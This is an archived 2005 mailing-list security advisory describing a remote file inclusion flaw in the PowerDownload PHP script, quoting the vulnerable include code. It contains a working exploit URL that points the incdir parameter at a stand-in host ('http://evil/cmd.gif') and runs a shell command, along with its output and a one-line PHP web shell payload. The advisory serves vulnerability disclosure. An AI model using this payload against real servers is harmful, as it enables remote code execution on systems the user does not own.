PowerDownload Remote File Inclusion

• Previous message: Xnuxer Security: "[XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Tue, 31 May 2005 00:05:34 -0300
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com, news@securiteam.com, sec@soulblack.com.ar, bugs@securitytracker.com, submissions@packetstormsecurity.org, vuln@secunia.com, alerts_advisories@net-security.org

===========================================================

============================================================
Title: PowerDownload Remote File Inclusion.
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 31/05/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: v3.0.2 & v3.0.3
vendor: http://www.powerscripts.org/
============================================================

============================================================

* Summary *

PowerDownload is a PHP and mySQL based Download Script.

-------------------------------------------------------------

* Problem Description *

The bug reside in $incdir var in pdl-inc/pdl_header.inc.php

Vulnerable Code

// Include required Files
if(!isset($incdir)) $incdir = "";
require($incdir."pdl-inc/pdl_config.inc.php");
require($incdir."pdl-inc/pdl_db_class_".strtolower($config_sql_type).".inc.php");
require($incdir."pdl-inc/pdl_functions.inc.php");

/*

http://server/download/downloads.php?release_id=650&incdir=http://evil/cmd.gif?&cmd=uname%20-a

Linux webserver101 2.4.21-243-athlon #1 Thu Aug 12 15:24:15 UTC 2004 i686 athlon

*/

/*
-------
cmd.gif
-------

<?
system($cmd);
?>

*/

-------------------------------------------------------------

-------------------------------------------------------------

* Fix *

 Contact the Vendor.

-------------------------------------------------------------

* References *

http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt

-------------------------------------------------------------

* Credits *

Vulnerability reported by SoulBlack Security Research

============================================================

--
SoulBlack - Security Research
http://www.soulblack.com.ar

• Previous message: Xnuxer Security: "[XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages PHP Stat Administrative User Authentication Bypass ... PHP Stat Administrative User Authentication Bypass ... Vulnerability reported by SoulBlack Security Research ... (Bugtraq) Cookie Cart Default Installation Multiple Vulnerabilities ... Remote users can obtain several data of Credits Cards, ... Vulnerability reported by SoulBlack Security Research ... (Bugtraq) [Full-disclosure] Guesbook Pro XSS & HTML Injection ... Guestbook PRO is an advanced guestbook for WebApp. ... A new vulnerability is in the content and title of msg, ... Vulnerability reported by SoulBlack Security Research ... (Full-Disclosure) [Full-disclosure] ExoPHPDesk is helpdesk written in PHP/SQL. ... Remote Users Can Execute Arbitrary Code. ... Vulnerability reported by SoulBlack Security Research. ... (Full-Disclosure) Guesbook Pro XSS & HTML Injection ... Guestbook PRO is an advanced guestbook for WebApp. ... A new vulnerability is in the content and title of msg, ... Vulnerability reported by SoulBlack Security Research ... (Bugtraq)